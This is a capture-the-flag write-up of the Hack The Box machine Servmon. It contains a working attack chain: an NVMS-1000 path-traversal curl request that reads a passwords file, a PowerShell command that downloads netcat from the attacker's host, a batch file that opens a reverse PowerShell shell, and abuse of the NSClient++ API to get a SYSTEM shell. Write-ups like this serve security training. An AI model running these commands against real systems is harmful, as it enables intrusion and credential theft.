Hackthebox – Servmon
As with any box, Servmon also gets some port scans.
root@kalivm:~/Servmon# nmap -oN fullscan-A -A 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 09:24 CEST
Nmap scan report for 10.10.10.184 (10.10.10.184)
Host is up (0.081s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-type: text/html
| Content-Length: 0
| Connection: close
| AuthInfo:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
|_ </html>
|_http-title: Site doesn't have a title (text/html).
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| refox/68.0
|_ ":{"context":"ini://${shared-
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=5/30%Time=5ED20A4C%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOption
SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4
SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt
SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf<
SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit
SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\
SF:.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<h
SF:ead>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20t
SF:ype=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc
SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\
SF:r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourRequest,65
SF:,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=5/30%Time=5ED20A53%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\nrefox/68\.0\0\0\0\0\0\0\0\0\x8f\x01\0\0\x04\0\
SF:0\0\0\0\0\":{\"context\":\"ini://\${shared-")%r(HTTPOptions,36,"HTTP/1\
SF:.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(
SF:FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\n
SF:Document\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nConten
SF:t-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTTP
SF:/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/30%OT=21%CT=1%CU=36972%PV=Y%DS=2%DC=T%G=Y%TM=5ED20AC
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%TS=U)SEQ(SP=1
OS:08%GCD=1%ISR=109%TI=I%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4
OS:=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF
OS:%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF
OS:=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%
OS:Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A
OS:%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y
OS:%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR
OS:%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3m58s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-30T07:30:33
|_ start_date: N/A
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 13.19 ms 10.10.14.1 (10.10.14.1)
2 428.93 ms 10.10.10.184 (10.10.10.184)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.16 secondsSo ports that are interesting are 21, with anonymous FTP, 22 on a windows box?! 80, the web server obviously and 8443 looks interesting too, no clue yet what it is though. Lets first start with the FTP server.
root@kalivm:~/Servmon# ncftp 10.10.10.184
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.184...
Microsoft FTP Service
Logging in...
User logged in.
Logged in to 10.10.10.184.
ncftp / > dir
d--------- 1 ftpuser ftpusers 0 Jan 18 12:05 Users
ncftp / > dir Users
d--------- 1 ftpuser ftpusers 0 Jan 18 12:06 Nadine
d--------- 1 ftpuser ftpusers 0 Jan 18 12:08 Nathan
ncftp / > dir Users/Nadine
---------- 1 ftpuser ftpusers 174 Jan 18 12:08 Confidential.txt
ncftp / > dir Users/Nathan
---------- 1 ftpuser ftpusers 186 Jan 18 12:10 Notes to do.txtSo the server contains a Users directory for Nathan and Nadine, and both directories contain one txt file.
root@kalivm:~/Servmon# cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePointNot too interesting, apparently Nathan has changed the password for NVMS and locked down NSCLient access, lets take a look at the Confidential file
root@kalivm:~/Servmon# cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
NadineOk, so there is a passwords.txt file on Nathan’s desktop… not yet sure what I can do with that, but good to keep in mind. Lets look further
On the webserver, NVMS1000 is hosted
root@kalivm:~/Servmon# searchsploit nvms 1000
----------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal| hardware/webapps/48311.py
----------------------------------- ---------------------------------A quick search on searchsploit shows that NVMS may be vulnerable to Path traversal, this may be interesting to combine with that Passwords.txt file since Nathan’s note said he had not yet uploaded the passwords or put the secret file in SharePoint!
root@kalivm:~/Servmon# curl --path-as-is http://10.10.10.184/../../../Users/Nathan/Desktop/Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$And there we have some passwords we can now try out! After using Metasploit’s smb_login scanner to see if there were any valid credentials, it appeared that L1k3B1gBut7s@W0rk is Nadine’s password, but that did not get me much further on the fileshares since there were none. However, there are more services to try it on.
root@kalivm:~/Servmon# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON c:\Users\Nadine>type Desktop\user.txt
17c689b81<NOFLAG>50a358e02cc96ceThe password worked for the SSH connection too and there we have the flag!
Privilege Escalation
But we’re no Administrator yet, so its time for privilege escalation. After some looking around, I found that there’s a NSClient++ tool installed. It did not work all that well using firefox, so I started Chromium to check it and it kinda worked.
However, I did not yet have a password, but did find this exploit on exploitDB on how to get it using the commandline, which also was mentioned in the UI under ‘forget password’
nadine@SERVMON C:\Users\Nadine>cd "c:\Program Files\NSClient++"
nadine@SERVMON c:\Program Files\NSClient++>type nsclient.ini
----snip----
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
----snip----Wait, so the allowed hosts setting is limited to 127.0.0.1, that must be the access Lockdown Nathan had in his Todo File. It means I need a tunnel to that machine so lets restart the ssh connection to do so.
root@kalivm:~/Servmon# ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>cd "c:\Program Files\NSClient++"
nadine@SERVMON c:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOTAfter using the password display command, it showed the same password so that must be it. After logging into the web UI, I could not really get it to work the way I wanted and got stuck for a while. After asking on Discord for a little nudge, someone told to go through the API instead, and after reading some of the API documentation, that appeared to be easy. So I downloaded netcat to Servmon and prepared a batch file locally.
nadine@SERVMON C:\Users\Nadine>powershell IWR -uri http://10.10.15.30:8000/windows/nc.exe -outfile c:\Temp\nc.exe
root@kalivm:~/Servmon# cat sedje.bat
@echo off
c:\Temp\nc.exe 10.10.15.30 9000 -e powershell
root@kalivm:~/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/sedje.bat --data-binary @sedje.bat
Enter host password for user 'admin':
Added sedje as scriptsI added the script and had to start a listener and restart the service, after browsing to the Queries screen in the web interface, the connection came in.
root@kalivm:~/~# nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.184 50975
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Program Files\NSClient++>whoami
whoami
nt authority\systemAnd there I have a shell as nt authority\system. Now all that is left, is to get the flag
PS C:\Program Files\NSClient++> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 30/05/2020 09:39 34 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c9fd74d2e<NOFLAG>28d140be18e8a97
